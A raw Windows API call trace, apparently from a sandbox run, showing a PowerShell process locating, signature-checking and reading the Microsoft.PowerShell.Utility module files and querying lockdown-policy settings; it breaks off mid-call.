[0231.280] CertDuplicateCertificateContext (pCertContext=0x1a939720) returned 0x1a939720 [0231.280] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\3\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1b7fd2b8 | out: phkResult=0x1b7fd2b8*=0x6dc) returned 0x0 [0231.280] RegQueryValueExW (in: hKey=0x6dc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1b7fd308, lpData=0x0, lpcbData=0x1b7fd300*=0x0 | out: lpType=0x1b7fd308*=0x1, lpData=0x0, lpcbData=0x1b7fd300*=0x56) returned 0x0 [0231.280] RegQueryValueExW (in: hKey=0x6dc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1b7fd308, lpData=0x24a2f90, lpcbData=0x1b7fd300*=0x56 | out: lpType=0x1b7fd308*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1b7fd300*=0x56) returned 0x0 [0231.280] RegCloseKey (hKey=0x6dc) returned 0x0 [0231.280] CoTaskMemAlloc (cb=0x10) returned 0x1a904600 [0231.281] CoTaskMemAlloc (cb=0x50) returned 0x1a9b0300 [0231.281] WinVerifyTrust () returned 0x0 [0231.281] CoTaskMemFree (pv=0x1a9b0300) [0231.281] CoTaskMemFree (pv=0x1a904600) [0231.281] CertFreeCertificateContext (pCertContext=0x1a939720) returned 1 [0231.282] CloseHandle (hObject=0x6a4) returned 1 [0231.287] GetFullPathNameW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", nBufferLength=0x105, lpBuffer=0x1b7fd570, lpFilePart=0x0 | out: lpBuffer="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", lpFilePart=0x0) returned 0x71 [0231.287] GetFileAttributesW (lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\en-US\\Microsoft.PowerShell.Utility.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\en-us\\microsoft.powershell.utility.psd1")) returned 0xffffffff [0231.288] GetFileAttributesW (lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\en\\Microsoft.PowerShell.Utility.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\en\\microsoft.powershell.utility.psd1")) returned 0xffffffff [0231.295] GetFullPathNameW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", nBufferLength=0x105, lpBuffer=0x1b7fc590, lpFilePart=0x0 | out: lpBuffer="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", lpFilePart=0x0) returned 0x71 [0231.297] GetFullPathNameW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", nBufferLength=0x105, lpBuffer=0x1b7fc5b0, lpFilePart=0x0 | out: lpBuffer="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", lpFilePart=0x0) returned 0x71 [0231.297] GetFullPathNameW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", nBufferLength=0x105, lpBuffer=0x1b7fc550, lpFilePart=0x0 | out: lpBuffer="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", lpFilePart=0x0) returned 0x71 [0231.297] GetFullPathNameW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility", nBufferLength=0x105, lpBuffer=0x1b7fc560, lpFilePart=0x0 | out: lpBuffer="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility", lpFilePart=0x0) returned 0x4f [0231.348] GetFullPathNameW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", nBufferLength=0x105, lpBuffer=0x1b7fc590, lpFilePart=0x0 | out: lpBuffer="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", lpFilePart=0x0) returned 0x71 [0231.349] GetFullPathNameW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\PSGetModuleInfo.xml", nBufferLength=0x105, lpBuffer=0x1b7fc5b0, lpFilePart=0x0 | out: lpBuffer="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\PSGetModuleInfo.xml", lpFilePart=0x0) returned 0x63 [0231.350] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fc9f0) returned 1 [0231.350] GetFileAttributesExW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\PSGetModuleInfo.xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\psgetmoduleinfo.xml"), fInfoLevelId=0x0, lpFileInformation=0x1b7fcad0 | out: lpFileInformation=0x1b7fcad0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0231.350] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fc9b0) returned 1 [0231.351] GetFileAttributesW (lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Commands.Utility.dll" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.commands.utility.dll")) returned 0xffffffff [0231.351] GetFileAttributesW (lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Commands.Utility.dll\\Microsoft.PowerShell.Commands.Utility.dll" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.commands.utility.dll\\microsoft.powershell.commands.utility.dll")) returned 0xffffffff [0231.351] CoTaskMemAlloc (cb=0x20e) returned 0x1a9b91b0 [0231.351] GetEnvironmentVariableW (in: lpName="PSMODULEPATH", lpBuffer=0x1a9b91b0, nSize=0x105 | out: lpBuffer="") returned 0x97 [0231.351] CoTaskMemFree (pv=0x1a9b91b0) [0231.351] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\WindowsPowerShell\\Modules", nBufferLength=0x105, lpBuffer=0x1b7fc370, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\WindowsPowerShell\\Modules", lpFilePart=0x0) returned 0x39 [0231.351] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fc7b0) returned 1 [0231.351] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\WindowsPowerShell\\Modules" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\windowspowershell\\modules"), fInfoLevelId=0x0, lpFileInformation=0x1b7fc890 | out: lpFileInformation=0x1b7fc890*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0231.352] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fc770) returned 1 [0231.353] GetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\WindowsPowerShell\\Modules" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\windowspowershell\\modules")) returned 0xffffffff [0231.377] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules", nBufferLength=0x105, lpBuffer=0x1b7fc370, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules", lpFilePart=0x0) returned 0x2a [0231.377] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fc7b0) returned 1 [0231.377] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules" (normalized: "c:\\program files\\windowspowershell\\modules"), fInfoLevelId=0x0, lpFileInformation=0x1b7fc890 | out: lpFileInformation=0x1b7fc890*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0231.378] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fc770) returned 1 [0231.378] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules", nBufferLength=0x105, lpBuffer=0x1b7fc370, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules", lpFilePart=0x0) returned 0x32 [0231.378] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fc7b0) returned 1 [0231.378] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules"), fInfoLevelId=0x0, lpFileInformation=0x1b7fc890 | out: lpFileInformation=0x1b7fc890*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x5000)) returned 1 [0231.378] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fc770) returned 1 [0231.378] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Commands.Utility", nBufferLength=0x105, lpBuffer=0x1b7fc1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Commands.Utility", lpFilePart=0x0) returned 0x50 [0231.378] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fc610) returned 1 [0231.378] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Commands.Utility" (normalized: "c:\\program files\\windowspowershell\\modules\\microsoft.powershell.commands.utility"), fInfoLevelId=0x0, lpFileInformation=0x1b7fc6f0 | out: lpFileInformation=0x1b7fc6f0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0231.378] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fc5d0) returned 1 [0231.379] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Commands.Utility\\Microsoft.PowerShell.Commands.Utility.dll" (normalized: "c:\\program files\\windowspowershell\\modules\\microsoft.powershell.commands.utility\\microsoft.powershell.commands.utility.dll")) returned 0xffffffff [0231.380] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Commands.Utility", nBufferLength=0x105, lpBuffer=0x1b7fc1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Commands.Utility", lpFilePart=0x0) returned 0x58 [0231.380] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fc610) returned 1 [0231.380] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Commands.Utility" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.commands.utility"), fInfoLevelId=0x0, lpFileInformation=0x1b7fc6f0 | out: lpFileInformation=0x1b7fc6f0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0231.380] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fc5d0) returned 1 [0231.381] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Commands.Utility\\Microsoft.PowerShell.Commands.Utility.dll" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.commands.utility\\microsoft.powershell.commands.utility.dll")) returned 0xffffffff [0231.620] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\v4.0_3.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x1b7fc110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\v4.0_3.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x99 [0231.620] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\v4.0_3.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x1b7fc010, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\v4.0_3.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x99 [0231.621] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\v4.0_3.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x1b7fbda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\v4.0_3.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x99 [0231.999] GetFullPathNameW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", nBufferLength=0x105, lpBuffer=0x1b7fbf70, lpFilePart=0x0 | out: lpBuffer="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", lpFilePart=0x0) returned 0x71 [0231.999] CoTaskMemAlloc (cb=0x20c) returned 0x1a8ef6d0 [0231.999] GetSystemDirectoryW (in: lpBuffer=0x1a8ef6d0, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0231.999] CoTaskMemFree (pv=0x1a8ef6d0) [0231.999] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1b7fbca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0232.000] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\wldp.dll", nBufferLength=0x105, lpBuffer=0x1b7fbe40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\wldp.dll", lpFilePart=0x0) returned 0x1c [0232.000] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fc280) returned 1 [0232.000] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\wldp.dll" (normalized: "c:\\windows\\system32\\wldp.dll"), fInfoLevelId=0x0, lpFileInformation=0x1b7fc360 | out: lpFileInformation=0x1b7fc360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x13812212, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x13812212, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x13812212, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x9370)) returned 1 [0232.000] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fc240) returned 1 [0232.000] WldpGetLockdownPolicy () returned 0x0 [0232.000] GetSystemInfo (in: lpSystemInfo=0x1b7fc3c0 | out: lpSystemInfo=0x1b7fc3c0*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0232.000] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x1b7fc2c8 | out: phkResult=0x1b7fc2c8*=0x694) returned 0x0 [0232.001] RegQueryValueExW (in: hKey=0x694, lpValueName="__PSLockdownPolicy", lpReserved=0x0, lpType=0x1b7fc318, lpData=0x0, lpcbData=0x1b7fc310*=0x0 | out: lpType=0x1b7fc318*=0x0, lpData=0x0, lpcbData=0x1b7fc310*=0x0) returned 0x2 [0232.001] RegCloseKey (hKey=0x694) returned 0x0 [0232.001] GetFullPathNameW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", nBufferLength=0x105, lpBuffer=0x1b7fbe10, lpFilePart=0x0 | out: lpBuffer="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", lpFilePart=0x0) returned 0x71 [0232.001] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fc2a0) returned 1 [0232.001] GetFileAttributesExW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psm1"), fInfoLevelId=0x0, lpFileInformation=0x25825d8 | out: lpFileInformation=0x25825d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f33bbf0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f33bbf0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f33bbf0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x5298)) returned 1 [0232.001] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fc260) returned 1 [0232.001] GetFullPathNameW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", nBufferLength=0x105, lpBuffer=0x1b7fbdd0, lpFilePart=0x0 | out: lpBuffer="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", lpFilePart=0x0) returned 0x71 [0232.001] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fc210) returned 1 [0232.001] GetFileAttributesExW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psm1"), fInfoLevelId=0x0, lpFileInformation=0x1b7fc2f0 | out: lpFileInformation=0x1b7fc2f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f33bbf0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f33bbf0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f33bbf0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x5298)) returned 1 [0232.001] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fc1d0) returned 1 [0232.001] GetFullPathNameW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", nBufferLength=0x105, lpBuffer=0x1b7fbd80, lpFilePart=0x0 | out: lpBuffer="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", lpFilePart=0x0) returned 0x71 [0232.001] GetFullPathNameW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", nBufferLength=0x105, lpBuffer=0x1b7fbbe0, lpFilePart=0x0 | out: lpBuffer="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", lpFilePart=0x0) returned 0x71 [0232.001] GetFullPathNameW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", nBufferLength=0x105, lpBuffer=0x1b7fbcb0, lpFilePart=0x0 | out: lpBuffer="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", lpFilePart=0x0) returned 0x71 [0232.001] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fc0f0) returned 1 [0232.002] GetFileAttributesExW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psm1"), fInfoLevelId=0x0, lpFileInformation=0x1b7fc1d0 | out: lpFileInformation=0x1b7fc1d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f33bbf0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f33bbf0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f33bbf0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x5298)) returned 1 [0232.002] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fc0b0) returned 1 [0232.002] GetFullPathNameW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", nBufferLength=0x105, lpBuffer=0x1b7fbba0, lpFilePart=0x0 | out: lpBuffer="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", lpFilePart=0x0) returned 0x71 [0232.002] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fc080) returned 1 [0232.002] CreateFileW (lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psm1"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x694 [0232.002] GetFileType (hFile=0x694) returned 0x1 [0232.002] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fbff0) returned 1 [0232.002] GetFileType (hFile=0x694) returned 0x1 [0232.002] WTGetSignatureInfo () returned 0x0 [0232.074] CertDuplicateCertificateContext (pCertContext=0x1a9372a0) returned 0x1a9372a0 [0232.074] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\3\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1b7fc118 | out: phkResult=0x1b7fc118*=0x6ec) returned 0x0 [0232.074] RegQueryValueExW (in: hKey=0x6ec, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1b7fc168, lpData=0x0, lpcbData=0x1b7fc160*=0x0 | out: lpType=0x1b7fc168*=0x1, lpData=0x0, lpcbData=0x1b7fc160*=0x56) returned 0x0 [0232.074] RegQueryValueExW (in: hKey=0x6ec, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1b7fc168, lpData=0x2583470, lpcbData=0x1b7fc160*=0x56 | out: lpType=0x1b7fc168*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1b7fc160*=0x56) returned 0x0 [0232.074] RegCloseKey (hKey=0x6ec) returned 0x0 [0232.074] CoTaskMemAlloc (cb=0x10) returned 0x1a905fa0 [0232.074] CoTaskMemAlloc (cb=0x50) returned 0x1a9aeda0 [0232.074] WinVerifyTrust () returned 0x0 [0232.075] CoTaskMemFree (pv=0x1a9aeda0) [0232.075] CoTaskMemFree (pv=0x1a905fa0) [0232.075] CertFreeCertificateContext (pCertContext=0x1a9372a0) returned 1 [0232.075] CloseHandle (hObject=0x694) returned 1 [0232.075] GetFullPathNameW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", nBufferLength=0x105, lpBuffer=0x1b7fbd30, lpFilePart=0x0 | out: lpBuffer="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", lpFilePart=0x0) returned 0x71 [0232.075] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fc210) returned 1 [0232.075] CreateFileW (lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psm1"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x694 [0232.076] GetFileType (hFile=0x694) returned 0x1 [0232.076] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fc180) returned 1 [0232.076] GetFileType (hFile=0x694) returned 0x1 [0232.076] SetFilePointer (in: hFile=0x694, lDistanceToMove=0, lpDistanceToMoveHigh=0x1b7fc1c8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x1b7fc1c8*=0) returned 0x0 [0232.076] ReadFile (in: hFile=0x694, lpBuffer=0x25846b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b7fc248, lpOverlapped=0x0 | out: lpBuffer=0x25846b0*, lpNumberOfBytesRead=0x1b7fc248*=0x1000, lpOverlapped=0x0) returned 1 [0232.076] SetFilePointer (in: hFile=0x694, lDistanceToMove=0, lpDistanceToMoveHigh=0x1b7fc1c8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x1b7fc1c8*=0) returned 0x1000 [0232.076] ReadFile (in: hFile=0x694, lpBuffer=0x25846b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b7fc248, lpOverlapped=0x0 | out: lpBuffer=0x25846b0*, lpNumberOfBytesRead=0x1b7fc248*=0x1000, lpOverlapped=0x0) returned 1 [0232.076] SetFilePointer (in: 